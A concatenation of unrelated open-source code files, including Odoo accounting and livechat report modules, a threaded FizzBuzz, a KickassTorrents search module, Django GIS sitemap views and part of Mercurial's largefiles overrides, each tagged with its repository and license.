# ITK with ITK_CSWIG_CONNECTVTKITK set to ON)
CVIPy.ConnectITKUS2ToVTK(itkExporter, vtkImporter)
# finally write the image to disk using VTK
writer = vtk.vtkPNGWriter()
writer.SetFileName('./testout.png')
writer.SetInput(vtkImporter.GetOutput())
# before we call Write() on the writer, it is prudent to give
# our ITK pipeline an Update() call... this is not necessary
# for normal error-less operation, but ensures that exceptions
# thrown by ITK get through to us in the case of an error;
# This is because the VTK wrapping system does not support
# C++ exceptions.
rescaler.Update()
# write the file to disk...
writer.Write()
print "\n\nWrote testout.png to current directory."
| apache-2.0 |
savoirfairelinux/odoo | addons/account/report/account_balance.py | 183 | 6162 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import osv
from openerp.report import report_sxw
from common_report_header import common_report_header
class account_balance(report_sxw.rml_parse, common_report_header):
_name = 'report.account.account.balance'
def __init__(self, cr, uid, name, context=None):
super(account_balance, self).__init__(cr, uid, name, context=context)
self.sum_debit = 0.00
self.sum_credit = 0.00
self.date_lst = []
self.date_lst_string = ''
self.result_acc = []
self.localcontext.update({
'time': time,
'lines': self.lines,
'sum_debit': self._sum_debit,
'sum_credit': self._sum_credit,
'get_fiscalyear':self._get_fiscalyear,
'get_filter': self._get_filter,
'get_start_period': self.get_start_period,
'get_end_period': self.get_end_period ,
'get_account': self._get_account,
'get_journal': self._get_journal,
'get_start_date':self._get_start_date,
'get_end_date':self._get_end_date,
'get_target_move': self._get_target_move,
})
self.context = context
def set_context(self, objects, data, ids, report_type=None):
new_ids = ids
if (data['model'] == 'ir.ui.menu'):
new_ids = 'chart_account_id' in data['form'] and [data['form']['chart_account_id']] or []
objects = self.pool.get('account.account').browse(self.cr, self.uid, new_ids)
return super(account_balance, self).set_context(objects, data, new_ids, report_type=report_type)
def _get_account(self, data):
if data['model']=='account.account':
return self.pool.get('account.account').browse(self.cr, self.uid, data['form']['id']).company_id.name
return super(account_balance ,self)._get_account(data)
def lines(self, form, ids=None, done=None):
def _process_child(accounts, disp_acc, parent):
account_rec = [acct for acct in accounts if acct['id']==parent][0]
currency_obj = self.pool.get('res.currency')
acc_id = self.pool.get('account.account').browse(self.cr, self.uid, account_rec['id'])
currency = acc_id.currency_id and acc_id.currency_id or acc_id.company_id.currency_id
res = {
'id': account_rec['id'],
'type': account_rec['type'],
'code': account_rec['code'],
'name': account_rec['name'],
'level': account_rec['level'],
'debit': account_rec['debit'],
'credit': account_rec['credit'],
'balance': account_rec['balance'],
'parent_id': account_rec['parent_id'],
'bal_type': '',
}
self.sum_debit += account_rec['debit']
self.sum_credit += account_rec['credit']
if disp_acc == 'movement':
if not currency_obj.is_zero(self.cr, self.uid, currency, res['credit']) or not currency_obj.is_zero(self.cr, self.uid, currency, res['debit']) or not currency_obj.is_zero(self.cr, self.uid, currency, res['balance']):
self.result_acc.append(res)
elif disp_acc == 'not_zero':
if not currency_obj.is_zero(self.cr, self.uid, currency, res['balance']):
self.result_acc.append(res)
else:
self.result_acc.append(res)
if account_rec['child_id']:
for child in account_rec['child_id']:
_process_child(accounts,disp_acc,child)
obj_account = self.pool.get('account.account')
if not ids:
ids = self.ids
if not ids:
return []
if not done:
done={}
ctx = self.context.copy()
ctx['fiscalyear'] = form['fiscalyear_id']
if form['filter'] == 'filter_period':
ctx['period_from'] = form['period_from']
ctx['period_to'] = form['period_to']
elif form['filter'] == 'filter_date':
ctx['date_from'] = form['date_from']
ctx['date_to'] = form['date_to']
ctx['state'] = form['target_move']
parents = ids
child_ids = obj_account._get_children_and_consol(self.cr, self.uid, ids, ctx)
if child_ids:
ids = child_ids
accounts = obj_account.read(self.cr, self.uid, ids, ['type','code','name','debit','credit','balance','parent_id','level','child_id'], ctx)
for parent in parents:
if parent in done:
continue
done[parent] = 1
_process_child(accounts,form['display_account'],parent)
return self.result_acc
class report_trialbalance(osv.AbstractModel):
_name = 'report.account.report_trialbalance'
_inherit = 'report.abstract_report'
_template = 'account.report_trialbalance'
_wrapped_report_class = account_balance
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
RagingTiger/CodingInterview | ch15/python/fizbuzz.py | 1 | 2138 | #!/usr/bin/env python
'''
Author: John D. Anderson
Email: jander43@vols.utk.edu
Problem Statement:
In the classic problem FizzBuzz, you are told to print the numbers from 1
to n. However, when the number is divisible by 3, print "Fizz". When it is
divisible by 5, print "Buzz." When it is divisble by 3 and 5, print "FizzBuzz".
In this problem, you are asked to do this in a multithreaded way. Implement a
multithreaded version of FizzBuzz with four threads. One thread checks for
divisibility of 3 and prints "Fizz". Another thread is responsible for
divisibility of 5 and prints "Buzz". A third thread is responsible for
divisibility of 3 and 5 and prints "FizzBuzz". A fourth thread does the
numbers.
Complexity: TODO
Usage: fizzbuzz <int>
'''
# libraries
import threading
# closure
def threading_closure(word):
'''
Closure for wrapping.
Reference:
"Design Patterns: Elements of Reusable Object-Oriented Software",
Adapter Pattern, pages: 325 - 330.
"Intermediate Python Programming",
Closures, pages: 83 - 85
'''
# results
def thread_results():
print word
# closed over function
def thread_execute():
'''
Function to print thread specific output.
'''
t = threading.Thread(target=thread_results)
t.start()
t.join()
# return function
return thread_execute
# function
def answer(n):
# generating functions
fb = ['fizz', 'buzz', 'fizzbuzz']
threads = {name: threading_closure(name) for name in fb}
# iterate from
for i in range(1, n+1):
# calculate
three = not i % 3
five = not i % 5
# fizz buzz
if three and five:
threads['fizzbuzz']()
elif three:
threads['fizz']()
elif five:
threads['buzz']()
else:
# called function that is returned
threading_closure(i)()
# executable
if __name__ == '__main__':
# executable import only
from docopt import docopt
# check CLA
args = docopt(__doc__)
# run
answer(int(args['<int>']))
| mit |
varogami/bt-tools | oldmodules/kck.py | 1 | 8266 | #bt-tools - tools to interact with some bittorrent sites by commandline
#modified by qbittorrent ( http://www.qbittorrent.org/ ) search plugin
#qbittorrent author: Christophe Dumez (chris@qbittorrent.org)
#Copyright (C) 2015 varogami
#This program is free software: you can redistribute it and/or modify
#it under the terms of the GNU General Public License as published by
#the Free Software Foundation, either version 3 of the License, or
#(at your option) any later version.
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#You should have received a copy of the GNU General Public License
#along with this program. If not, see <http://www.gnu.org/licenses/>.
#module config
use_pwd = False
m_pages = 4 #11 - limit pages
#m_url = 'https://kickass.to'
m_url = 'https://kat.cr'
m_name = 'kickasstorrents'
m_shortname = 'KCK'
m_rss_light_download = True
m_cats = {
'all': '',
'anime':'Anime',
'other':'Other',
'movie': 'Movies',
'books': 'Books',
'tv': 'TV',
'music': 'Music',
'xxx': 'XXX',
'games': 'Games',
'apps': 'Applications'}
m_default_cat = 'all'
m_rss_filter = None #None - for not set filter - filter rss feed
import json, urllib, datetime, utils, httplib2
from BeautifulSoup import BeautifulSoup
class Item:
def __init__(self, name, weblink, date, size):
self.name = name
self.date = self._convert_date(date)
self.link = weblink
self.size = size
self.id = self._get_id(weblink)
self.magnet = None
self.files = None
self.seed = None
self.leech = None
self.compl = None
self.hashvalue = None
self.idate = datetime.datetime.utcnow().strftime("%a, %d %b %Y %H:%M:%S UTC")
self.torrent_link = None
self.torrent_link_alt1 = None
self.torrent_link_alt2 = None
self.descr = None
def _get_id(self, link):
string = link.replace(".html","")
count = len(string) - 1
char="a"
while not char == "t":
char = string[count]
count = count-1
count=count+2
id = string[count:]
return id
def _convert_date(self, date):
months = { "Jan":1, "Feb":2, "Mar":3, "Apr":4, "May":5, "Jun":6, "Jul":7, "Aug":8, "Sep":9, "Oct":10, "Nov":11, "Dec":12 }
week, day, month_w, year, time, gmt = date.split(" ")
month = months[month_w]
hour, minutes, second = time.split(":")
newdate = datetime.datetime(int(year),int(month),int(day),int(hour),int(minutes),int(second))
finaldate = newdate.strftime("%a, %d %b %Y %H:%M:%S GMT")
return finaldate
class Data:
def __init__(self, debug = False):
self.pages = m_pages
self.list = []
self.url = m_url
self.name = m_name
self.shortname = m_shortname
self.cats = m_cats
self.cat = m_default_cat
self.filter = m_rss_filter
self.debug = debug
self.rss_light_download = m_rss_light_download
def makeVoidItem(self):
void = Item("void","https://void/void-tvoid.html","Friday 1 Jun 1970 00:00:00 +0000","0")
void.date = None
void.size = None
void.name = None
return void
def search(self, what, cat='all'):
self.cat = cat
ret = []
i = 1
while True and i<self.pages:
results = []
pattern = urllib.urlencode(dict(q = what))
try:
u = urllib.urlopen( self.url + '/json.php?%s&page=%d' %(pattern ,i) ) #was urllib2
json_data = u.read()
try:
json_dict = json.loads(json_data)
except:
i += 1
continue
if int(json_dict['total_results']) <= 0:
return
results = json_dict['list']
for r in results:
try:
if cat != 'all' and self.cats[cat] != r['category']:
continue
name = r['title']
size = str(r['size'])
seeds = r['seeds']
leech = r['leechs']
link = r['torrentLink']
desc_link = r['link']
date = r['pubDate']
files = r['files'] #to use in the future
hash = r['hash']
newitem = Item( name, desc_link, date, str(size) )
newitem.torrent_link = link
newitem.seed = str(seeds)
newitem.leech = str(leech)
newitem.hashvalue = hash
newitem.magnet = utils.get_mag_by_hash(hash)
newitem.torrent_link_alt1 = utils.get_url_by_hash(hash, utils.link_torcache )
newitem.torrent_link_alt2 = utils.get_url_by_hash(hash, utils.link_zoink )
self.list.append(newitem)
except:
pass
except urllib.HTTPError, e:
print self.shortname +" http error: " + str(e.code)
except urllib.URLError, e:
print self.shortname +" url error: " + str(e.args)
i += 1
def _get_rss(self, code):
import feedparser
parsedRss = feedparser.parse(code)
for i in parsedRss.entries:
name = i['title']
link = i['guid']
date = i['published']
torrent_link = i.enclosures[0]['href']
size = i.enclosures[0]['length']
magnet = i['torrent_magneturi']
hashvalue = i['torrent_infohash']
if not self.filter == None:
if utils.search_words_case_insens(self.filter, name):
newitem = Item( name, link, date, str(size) )
newitem.torrent_link = torrent_link
newitem.hashvalue = hashvalue
newitem.magnet = magnet
self.list.append(newitem)
def getFeed(self, cat):
self.cat=cat
try:
u = urllib.urlopen( self.url + '/' + self.cats[cat].lower() + '/?rss=1' )
data = u.read()
self._get_rss(data)
except urllib.HTTPError, e:
print self.shortname +" http error: " + str(e.code)
except urllib.URLError, e:
print self.shortname +" url error: " + str(e.args)
except Exception, e:
print self.shortname + " error: " + str(e)
def get_detail_data(self, item_obj):
try:
result=httplib2.Http()
resp,content=result.request(item_obj.link, 'GET')
parsedDetails = BeautifulSoup( content ,convertEntities = BeautifulSoup.HTML_ENTITIES )
item_obj.magnet = parsedDetails.find('a',{'title':'Magnet link'}).get('href')
item_obj.leech = parsedDetails.find('div',{'class':'widgetLeech'}).find('strong').getText()
item_obj.seed = parsedDetails.find('div',{'class':'widgetSeed'}).find('strong').getText()
size = parsedDetails.find('div',{'class':'widgetSize'}).find('strong').getText()
cut=len(size)-2
size2 = size[:cut] + " " + size[cut:]
item_obj.size = utils.getBytes(size2)
item_obj.compl = parsedDetails.find('div',{'class':'font11px lightgrey line160perc'}).getText().split("Downloaded ")[1].split(" times.")[0].replace(",","")
#item_obj.descr = parsedDetails.find('div',{'class':'dataList'})
except Exception, e:
print self.shortname + " error: " + str(e)
def getCategory(self, type):
"""build data object of single category by website page (only 1 page)"""
pass
def get_torrent_file(self, item):
utils.get_torrent_file(item, self.shortname, download_path)
| gpl-3.0 |
x303597316/hue | desktop/core/ext-py/Django-1.6.10/django/contrib/gis/sitemaps/views.py | 114 | 4439 | from __future__ import unicode_literals
from django.http import HttpResponse, Http404
from django.template import loader
from django.contrib.sites.models import get_current_site
from django.core import urlresolvers
from django.core.paginator import EmptyPage, PageNotAnInteger
from django.contrib.gis.db.models.fields import GeometryField
from django.db import connections, DEFAULT_DB_ALIAS
from django.db.models import get_model
from django.utils import six
from django.utils.translation import ugettext as _
from django.contrib.gis.shortcuts import render_to_kml, render_to_kmz
def index(request, sitemaps):
"""
This view generates a sitemap index that uses the proper view
for resolving geographic section sitemap URLs.
"""
current_site = get_current_site(request)
sites = []
protocol = 'https' if request.is_secure() else 'http'
for section, site in sitemaps.items():
if callable(site):
pages = site().paginator.num_pages
else:
pages = site.paginator.num_pages
sitemap_url = urlresolvers.reverse('django.contrib.gis.sitemaps.views.sitemap', kwargs={'section': section})
sites.append('%s://%s%s' % (protocol, current_site.domain, sitemap_url))
if pages > 1:
for page in range(2, pages+1):
sites.append('%s://%s%s?p=%s' % (protocol, current_site.domain, sitemap_url, page))
xml = loader.render_to_string('sitemap_index.xml', {'sitemaps': sites})
return HttpResponse(xml, content_type='application/xml')
def sitemap(request, sitemaps, section=None):
"""
This view generates a sitemap with additional geographic
elements defined by Google.
"""
maps, urls = [], []
if section is not None:
if section not in sitemaps:
raise Http404(_("No sitemap available for section: %r") % section)
maps.append(sitemaps[section])
else:
maps = list(six.itervalues(sitemaps))
page = request.GET.get("p", 1)
current_site = get_current_site(request)
for site in maps:
try:
if callable(site):
urls.extend(site().get_urls(page=page, site=current_site))
else:
urls.extend(site.get_urls(page=page, site=current_site))
except EmptyPage:
raise Http404(_("Page %s empty") % page)
except PageNotAnInteger:
raise Http404(_("No page '%s'") % page)
xml = loader.render_to_string('gis/sitemaps/geo_sitemap.xml', {'urlset': urls})
return HttpResponse(xml, content_type='application/xml')
def kml(request, label, model, field_name=None, compress=False, using=DEFAULT_DB_ALIAS):
"""
This view generates KML for the given app label, model, and field name.
The model's default manager must be GeoManager, and the field name
must be that of a geographic field.
"""
placemarks = []
klass = get_model(label, model)
if not klass:
raise Http404('You must supply a valid app label and module name. Got "%s.%s"' % (label, model))
if field_name:
try:
info = klass._meta.get_field_by_name(field_name)
if not isinstance(info[0], GeometryField):
raise Exception
except:
raise Http404('Invalid geometry field.')
connection = connections[using]
if connection.ops.postgis:
# PostGIS will take care of transformation.
placemarks = klass._default_manager.using(using).kml(field_name=field_name)
else:
# There's no KML method on Oracle or MySQL, so we use the `kml`
# attribute of the lazy geometry instead.
placemarks = []
if connection.ops.oracle:
qs = klass._default_manager.using(using).transform(4326, field_name=field_name)
else:
qs = klass._default_manager.using(using).all()
for mod in qs:
mod.kml = getattr(mod, field_name).kml
placemarks.append(mod)
# Getting the render function and rendering to the correct.
if compress:
render = render_to_kmz
else:
render = render_to_kml
return render('gis/kml/placemarks.kml', {'places' : placemarks})
def kmz(request, label, model, field_name=None, using=DEFAULT_DB_ALIAS):
"""
This view returns KMZ for the given app label, model, and field name.
"""
return kml(request, label, model, field_name, compress=True, using=using)
| apache-2.0 |
rven/odoo | addons/im_livechat/report/im_livechat_report_channel.py | 4 | 6358 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import api, fields, models, tools
class ImLivechatReportChannel(models.Model):
""" Livechat Support Report on the Channels """
_name = "im_livechat.report.channel"
_description = "Livechat Support Channel Report"
_order = 'start_date, technical_name'
_auto = False
uuid = fields.Char('UUID', readonly=True)
channel_id = fields.Many2one('mail.channel', 'Conversation', readonly=True)
channel_name = fields.Char('Channel Name', readonly=True)
technical_name = fields.Char('Code', readonly=True)
livechat_channel_id = fields.Many2one('im_livechat.channel', 'Channel', readonly=True)
start_date = fields.Datetime('Start Date of session', readonly=True, help="Start date of the conversation")
start_hour = fields.Char('Start Hour of session', readonly=True, help="Start hour of the conversation")
day_number = fields.Char('Day Number', readonly=True, help="Day number of the session (1 is Monday, 7 is Sunday)")
time_to_answer = fields.Float('Time to answer (sec)', digits=(16, 2), readonly=True, group_operator="avg", help="Average time in seconds to give the first answer to the visitor")
start_date_hour = fields.Char('Hour of start Date of session', readonly=True)
duration = fields.Float('Average duration', digits=(16, 2), readonly=True, group_operator="avg", help="Duration of the conversation (in seconds)")
nbr_speaker = fields.Integer('# of speakers', readonly=True, group_operator="avg", help="Number of different speakers")
nbr_message = fields.Integer('Average message', readonly=True, group_operator="avg", help="Number of message in the conversation")
is_without_answer = fields.Integer('Session(s) without answer', readonly=True, group_operator="sum",
help="""A session is without answer if the operator did not answer.
If the visitor is also the operator, the session will always be answered.""")
days_of_activity = fields.Integer('Days of activity', group_operator="max", readonly=True, help="Number of days since the first session of the operator")
is_anonymous = fields.Integer('Is visitor anonymous', readonly=True)
country_id = fields.Many2one('res.country', 'Country of the visitor', readonly=True)
is_happy = fields.Integer('Visitor is Happy', readonly=True)
rating = fields.Integer('Rating', group_operator="avg", readonly=True)
# TODO DBE : Use Selection field - Need : Pie chart must show labels, not keys.
rating_text = fields.Char('Satisfaction Rate', readonly=True)
is_unrated = fields.Integer('Session not rated', readonly=True)
partner_id = fields.Many2one('res.partner', 'Operator', readonly=True)
def init(self):
# Note : start_date_hour must be remove when the read_group will allow grouping on the hour of a datetime. Don't forget to change the view !
tools.drop_view_if_exists(self.env.cr, 'im_livechat_report_channel')
self.env.cr.execute("""
CREATE OR REPLACE VIEW im_livechat_report_channel AS (
SELECT
C.id as id,
C.uuid as uuid,
C.id as channel_id,
C.name as channel_name,
CONCAT(L.name, ' / ', C.id) as technical_name,
C.livechat_channel_id as livechat_channel_id,
C.create_date as start_date,
to_char(date_trunc('hour', C.create_date), 'YYYY-MM-DD HH24:MI:SS') as start_date_hour,
to_char(date_trunc('hour', C.create_date), 'HH24') as start_hour,
extract(dow from C.create_date) as day_number,
EXTRACT('epoch' FROM MAX(M.create_date) - MIN(M.create_date)) AS duration,
EXTRACT('epoch' FROM MIN(MO.create_date) - MIN(M.create_date)) AS time_to_answer,
count(distinct C.livechat_operator_id) as nbr_speaker,
count(distinct M.id) as nbr_message,
CASE
WHEN EXISTS (select distinct M.author_id FROM mail_message M, mail_message_mail_channel_rel R
WHERE M.author_id=C.livechat_operator_id AND R.mail_channel_id = C.id
AND R.mail_message_id = M.id and C.livechat_operator_id = M.author_id)
THEN 0
ELSE 1
END as is_without_answer,
(DATE_PART('day', date_trunc('day', now()) - date_trunc('day', C.create_date)) + 1) as days_of_activity,
CASE
WHEN C.anonymous_name IS NULL THEN 0
ELSE 1
END as is_anonymous,
C.country_id,
CASE
WHEN rate.rating = 5 THEN 1
ELSE 0
END as is_happy,
Rate.rating as rating,
CASE
WHEN Rate.rating = 1 THEN 'Unhappy'
WHEN Rate.rating = 5 THEN 'Happy'
WHEN Rate.rating = 3 THEN 'Neutral'
ELSE null
END as rating_text,
CASE
WHEN rate.rating > 0 THEN 0
ELSE 1
END as is_unrated,
C.livechat_operator_id as partner_id
FROM mail_channel C
JOIN mail_message_mail_channel_rel R ON (C.id = R.mail_channel_id)
JOIN mail_message M ON (M.id = R.mail_message_id)
JOIN im_livechat_channel L ON (L.id = C.livechat_channel_id)
LEFT JOIN mail_message MO ON (R.mail_message_id = MO.id AND MO.author_id = C.livechat_operator_id)
LEFT JOIN rating_rating Rate ON (Rate.res_id = C.id and Rate.res_model = 'mail.channel' and Rate.parent_res_model = 'im_livechat.channel')
WHERE C.livechat_operator_id is not null
GROUP BY C.livechat_operator_id, C.id, C.name, C.livechat_channel_id, L.name, C.create_date, C.uuid, Rate.rating
)
""")
| agpl-3.0 |
ryano144/intellij-community | plugins/hg4idea/testData/bin/hgext/largefiles/overrides.py | 90 | 46667 | # Copyright 2009-2010 Gregory P. Ward
# Copyright 2009-2010 Intelerad Medical Systems Incorporated
# Copyright 2010-2011 Fog Creek Software
# Copyright 2010-2011 Unity Technologies
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
'''Overridden Mercurial commands and functions for the largefiles extension'''
import os
import copy
from mercurial import hg, commands, util, cmdutil, scmutil, match as match_, \
node, archival, error, merge, discovery
from mercurial.i18n import _
from mercurial.node import hex
from hgext import rebase
import lfutil
import lfcommands
import basestore
# -- Utility functions: commonly/repeatedly needed functionality ---------------
def installnormalfilesmatchfn(manifest):
'''overrides scmutil.match so that the matcher it returns will ignore all
largefiles'''
oldmatch = None # for the closure
def overridematch(ctx, pats=[], opts={}, globbed=False,
default='relpath'):
match = oldmatch(ctx, pats, opts, globbed, default)
m = copy.copy(match)
notlfile = lambda f: not (lfutil.isstandin(f) or lfutil.standin(f) in
manifest)
m._files = filter(notlfile, m._files)
m._fmap = set(m._files)
m._always = False
origmatchfn = m.matchfn
m.matchfn = lambda f: notlfile(f) and origmatchfn(f) or None
return m
oldmatch = installmatchfn(overridematch)
def installmatchfn(f):
oldmatch = scmutil.match
setattr(f, 'oldmatch', oldmatch)
scmutil.match = f
return oldmatch
def restorematchfn():
'''restores scmutil.match to what it was before installnormalfilesmatchfn
was called. no-op if scmutil.match is its original function.
Note that n calls to installnormalfilesmatchfn will require n calls to
restore matchfn to reverse'''
scmutil.match = getattr(scmutil.match, 'oldmatch', scmutil.match)
def addlargefiles(ui, repo, *pats, **opts):
large = opts.pop('large', None)
lfsize = lfutil.getminsize(
ui, lfutil.islfilesrepo(repo), opts.pop('lfsize', None))
lfmatcher = None
if lfutil.islfilesrepo(repo):
lfpats = ui.configlist(lfutil.longname, 'patterns', default=[])
if lfpats:
lfmatcher = match_.match(repo.root, '', list(lfpats))
lfnames = []
m = scmutil.match(repo[None], pats, opts)
m.bad = lambda x, y: None
wctx = repo[None]
for f in repo.walk(m):
exact = m.exact(f)
lfile = lfutil.standin(f) in wctx
nfile = f in wctx
exists = lfile or nfile
# Don't warn the user when they attempt to add a normal tracked file.
# The normal add code will do that for us.
if exact and exists:
if lfile:
ui.warn(_('%s already a largefile\n') % f)
continue
if (exact or not exists) and not lfutil.isstandin(f):
wfile = repo.wjoin(f)
# In case the file was removed previously, but not committed
# (issue3507)
if not os.path.exists(wfile):
continue
abovemin = (lfsize and
os.lstat(wfile).st_size >= lfsize * 1024 * 1024)
if large or abovemin or (lfmatcher and lfmatcher(f)):
lfnames.append(f)
if ui.verbose or not exact:
ui.status(_('adding %s as a largefile\n') % m.rel(f))
bad = []
standins = []
# Need to lock, otherwise there could be a race condition between
# when standins are created and added to the repo.
wlock = repo.wlock()
try:
if not opts.get('dry_run'):
lfdirstate = lfutil.openlfdirstate(ui, repo)
for f in lfnames:
standinname = lfutil.standin(f)
lfutil.writestandin(repo, standinname, hash='',
executable=lfutil.getexecutable(repo.wjoin(f)))
standins.append(standinname)
if lfdirstate[f] == 'r':
lfdirstate.normallookup(f)
else:
lfdirstate.add(f)
lfdirstate.write()
bad += [lfutil.splitstandin(f)
for f in repo[None].add(standins)
if f in m.files()]
finally:
wlock.release()
return bad
def removelargefiles(ui, repo, *pats, **opts):
after = opts.get('after')
if not pats and not after:
raise util.Abort(_('no files specified'))
m = scmutil.match(repo[None], pats, opts)
try:
repo.lfstatus = True
s = repo.status(match=m, clean=True)
finally:
repo.lfstatus = False
manifest = repo[None].manifest()
modified, added, deleted, clean = [[f for f in list
if lfutil.standin(f) in manifest]
for list in [s[0], s[1], s[3], s[6]]]
def warn(files, msg):
for f in files:
ui.warn(msg % m.rel(f))
return int(len(files) > 0)
result = 0
if after:
remove, forget = deleted, []
result = warn(modified + added + clean,
_('not removing %s: file still exists\n'))
else:
remove, forget = deleted + clean, []
result = warn(modified, _('not removing %s: file is modified (use -f'
' to force removal)\n'))
result = warn(added, _('not removing %s: file has been marked for add'
' (use forget to undo)\n')) or result
for f in sorted(remove + forget):
if ui.verbose or not m.exact(f):
ui.status(_('removing %s\n') % m.rel(f))
# Need to lock because standin files are deleted then removed from the
# repository and we could race in-between.
wlock = repo.wlock()
try:
lfdirstate = lfutil.openlfdirstate(ui, repo)
for f in remove:
if not after:
# If this is being called by addremove, notify the user that we
# are removing the file.
if getattr(repo, "_isaddremove", False):
ui.status(_('removing %s\n') % f)
util.unlinkpath(repo.wjoin(f), ignoremissing=True)
lfdirstate.remove(f)
lfdirstate.write()
forget = [lfutil.standin(f) for f in forget]
remove = [lfutil.standin(f) for f in remove]
repo[None].forget(forget)
# If this is being called by addremove, let the original addremove
# function handle this.
if not getattr(repo, "_isaddremove", False):
for f in remove:
util.unlinkpath(repo.wjoin(f), ignoremissing=True)
repo[None].forget(remove)
finally:
wlock.release()
return result
# For overriding mercurial.hgweb.webcommands so that largefiles will
# appear at their right place in the manifests.
def decodepath(orig, path):
return lfutil.splitstandin(path) or path
# -- Wrappers: modify existing commands --------------------------------
# Add works by going through the files that the user wanted to add and
# checking if they should be added as largefiles. Then it makes a new
# matcher which matches only the normal files and runs the original
# version of add.
def overrideadd(orig, ui, repo, *pats, **opts):
normal = opts.pop('normal')
if normal:
if opts.get('large'):
raise util.Abort(_('--normal cannot be used with --large'))
return orig(ui, repo, *pats, **opts)
bad = addlargefiles(ui, repo, *pats, **opts)
installnormalfilesmatchfn(repo[None].manifest())
result = orig(ui, repo, *pats, **opts)
restorematchfn()
return (result == 1 or bad) and 1 or 0
def overrideremove(orig, ui, repo, *pats, **opts):
installnormalfilesmatchfn(repo[None].manifest())
result = orig(ui, repo, *pats, **opts)
restorematchfn()
return removelargefiles(ui, repo, *pats, **opts) or result
def overridestatusfn(orig, repo, rev2, **opts):
try:
repo._repo.lfstatus = True
return orig(repo, rev2, **opts)
finally:
repo._repo.lfstatus = False
def overridestatus(orig, ui, repo, *pats, **opts):
try:
repo.lfstatus = True
return orig(ui, repo, *pats, **opts)
finally:
repo.lfstatus = False
def overridedirty(orig, repo, ignoreupdate=False):
try:
repo._repo.lfstatus = True
return orig(repo, ignoreupdate)
finally:
repo._repo.lfstatus = False
def overridelog(orig, ui, repo, *pats, **opts):
def overridematch(ctx, pats=[], opts={}, globbed=False,
default='relpath'):
"""Matcher that merges root directory with .hglf, suitable for log.
It is still possible to match .hglf directly.
For any listed files run log on the standin too.
matchfn tries both the given filename and with .hglf stripped.
"""
match = oldmatch(ctx, pats, opts, globbed, default)
m = copy.copy(match)
standins = [lfutil.standin(f) for f in m._files]
m._files.extend(standins)
m._fmap = set(m._files)
m._always = False
origmatchfn = m.matchfn
def lfmatchfn(f):
lf = lfutil.splitstandin(f)
if lf is not None and origmatchfn(lf):
return True
r = origmatchfn(f)
return r
m.matchfn = lfmatchfn
return m
oldmatch = installmatchfn(overridematch)
try:
repo.lfstatus = True
return orig(ui, repo, *pats, **opts)
finally:
repo.lfstatus = False
restorematchfn()
def overrideverify(orig, ui, repo, *pats, **opts):
large = opts.pop('large', False)
all = opts.pop('lfa', False)
contents = opts.pop('lfc', False)
result = orig(ui, repo, *pats, **opts)
if large or all or contents:
result = result or lfcommands.verifylfiles(ui, repo, all, contents)
return result
def overridedebugstate(orig, ui, repo, *pats, **opts):
large = opts.pop('large', False)
if large:
lfcommands.debugdirstate(ui, repo)
else:
orig(ui, repo, *pats, **opts)
# Override needs to refresh standins so that update's normal merge
# will go through properly. Then the other update hook (overriding repo.update)
# will get the new files. Filemerge is also overridden so that the merge
# will merge standins correctly.
def overrideupdate(orig, ui, repo, *pats, **opts):
lfdirstate = lfutil.openlfdirstate(ui, repo)
s = lfdirstate.status(match_.always(repo.root, repo.getcwd()), [], False,
False, False)
(unsure, modified, added, removed, missing, unknown, ignored, clean) = s
# Need to lock between the standins getting updated and their
# largefiles getting updated
wlock = repo.wlock()
try:
if opts['check']:
mod = len(modified) > 0
for lfile in unsure:
standin = lfutil.standin(lfile)
if repo['.'][standin].data().strip() != \
lfutil.hashfile(repo.wjoin(lfile)):
mod = True
else:
lfdirstate.normal(lfile)
lfdirstate.write()
if mod:
raise util.Abort(_('uncommitted local changes'))
# XXX handle removed differently
if not opts['clean']:
for lfile in unsure + modified + added:
lfutil.updatestandin(repo, lfutil.standin(lfile))
finally:
wlock.release()
return orig(ui, repo, *pats, **opts)
# Before starting the manifest merge, merge.updates will call
# _checkunknown to check if there are any files in the merged-in
# changeset that collide with unknown files in the working copy.
#
# The largefiles are seen as unknown, so this prevents us from merging
# in a file 'foo' if we already have a largefile with the same name.
#
# The overridden function filters the unknown files by removing any
# largefiles. This makes the merge proceed and we can then handle this
# case further in the overridden manifestmerge function below.
def overridecheckunknownfile(origfn, repo, wctx, mctx, f):
if lfutil.standin(repo.dirstate.normalize(f)) in wctx:
return False
return origfn(repo, wctx, mctx, f)
# The manifest merge handles conflicts on the manifest level. We want
# to handle changes in largefile-ness of files at this level too.
#
# The strategy is to run the original manifestmerge and then process
# the action list it outputs. There are two cases we need to deal with:
#
# 1. Normal file in p1, largefile in p2. Here the largefile is
# detected via its standin file, which will enter the working copy
# with a "get" action. It is not "merge" since the standin is all
# Mercurial is concerned with at this level -- the link to the
# existing normal file is not relevant here.
#
# 2. Largefile in p1, normal file in p2. Here we get a "merge" action
# since the largefile will be present in the working copy and
# different from the normal file in p2. Mercurial therefore
# triggers a merge action.
#
# In both cases, we prompt the user and emit new actions to either
# remove the standin (if the normal file was kept) or to remove the
# normal file and get the standin (if the largefile was kept). The
# default prompt answer is to use the largefile version since it was
# presumably changed on purpose.
#
# Finally, the merge.applyupdates function will then take care of
# writing the files into the working copy and lfcommands.updatelfiles
# will update the largefiles.
def overridemanifestmerge(origfn, repo, p1, p2, pa, branchmerge, force,
partial, acceptremote=False):
overwrite = force and not branchmerge
actions = origfn(repo, p1, p2, pa, branchmerge, force, partial,
acceptremote)
processed = []
for action in actions:
if overwrite:
processed.append(action)
continue
f, m, args, msg = action
choices = (_('&Largefile'), _('&Normal file'))
splitstandin = lfutil.splitstandin(f)
